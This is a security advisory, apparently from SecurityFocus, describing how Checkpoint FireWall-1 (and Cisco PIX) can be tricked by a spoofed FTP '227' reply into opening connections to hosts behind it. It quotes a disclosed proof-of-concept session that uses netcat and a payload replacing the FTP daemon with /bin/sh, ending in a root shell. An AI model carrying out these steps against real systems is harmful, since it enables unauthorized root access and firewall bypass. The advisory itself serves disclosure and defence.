Multiple Firewall Vendor FTP Server Vulnerability

A vulnerability exists in the way that Checkpoint FireWall-1 handles packets sent from an FTP server to a connecting client. An attacker may be able to exploit this weakness to establish connections to any machine residing behind a FireWall-1 machine, or send packets in to a network protected by a FireWall-1.

FireWall-1 monitors packets from the FTP server to the client, looking for the string "227 " at the beginning of each packet. If FW-1 finds a packet which matches this criteria, it will extract the destination address and port, verify that the specified destination address matches the source of the packet, and allow TCP connections through the firewall to the destination IP and port.

In FireWall-1 4.0, these TCP connections can only send data in one direction. Under FireWall-1 3.0 and prior, this limitation does not exist. In addition, under FW-1 4.0 the data cannot be travelling to a port that is defined in FW-1's list of well known TCP services.

The details of the vulnerability posted by John McDonald <jm@dataprotect.com> contained the following example:

"Here is an example of an attack based on this technique. There is
a FireWall-1 machine between gumpe and the 172.16.0.2 server, which
only permits incoming FTP connections. 172.16.0.2 is a default
Solaris 2.6 install, with the Tooltalk Database vulnerability.
We send the datagram directly to the service's TCP port, in spite of
this port being blocked by the firewall. Note that since there is no
response expected, the one-way restriction doesn't affect this
attack.

All of our testing was done on a Nokia IPSO machine running FW-1
version 4.0.SP-4.

[root@gumpe /root]# strings hackfile
localhost
""""3333DDDD/bin/ksh.-c.cp /usr/sbin/in.ftpd /tmp/in.ftpd.back ; rm -f
/usr/sbin/in.ftpd ; cp /bin/sh /usr/sbin/in.ftpd
[root@gumpe /root]# /sbin/ifconfig eth0 mtu 100
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 21 (?) open
220 sol FTP server (SunOS 5.6) ready.
...........................................227 (172,16,0,2,128,7)
500 '...........................................
[1]+ Stopped nc -vvv 172.16.0.2 21
[root@gumpe /root]# cat killfile | nc -vv 172.16.0.2 32775
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 32775 (?) open
sent 80, rcvd 0
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 21 (?) open
220 sol FTP server (SunOS 5.6) ready.
...........................................227 (172,16,0,2,128,7)
500 '...........................................
[2]+ Stopped nc -vvv 172.16.0.2 21
[root@gumpe /root]# cat hackfile | nc -vv 172.16.0.2 32775
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 32775 (?) open
sent 1168, rcvd 0
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 21 (?) open
id
uid=0(root) gid=0(root)

There is an easier way to perform a similar attack on this setup, since
the default Solaris FTP daemon allows a bounce attack, but this should
suffice to demonstrate the potential severity of this problem."

In summary, if a network has an FTP server accesible behind a FireWall-1 firewall, that they allow the outside world access to, it may be possible for an attacker to open TCP connections to certain ports on that FTP machine.

This vulnerability is not specific to Firewall-1. It has been demonstrated that the PIX firewall, from Cisco, is also vulnerable.


 

Privacy Statement
Copyright 2010, SecurityFocus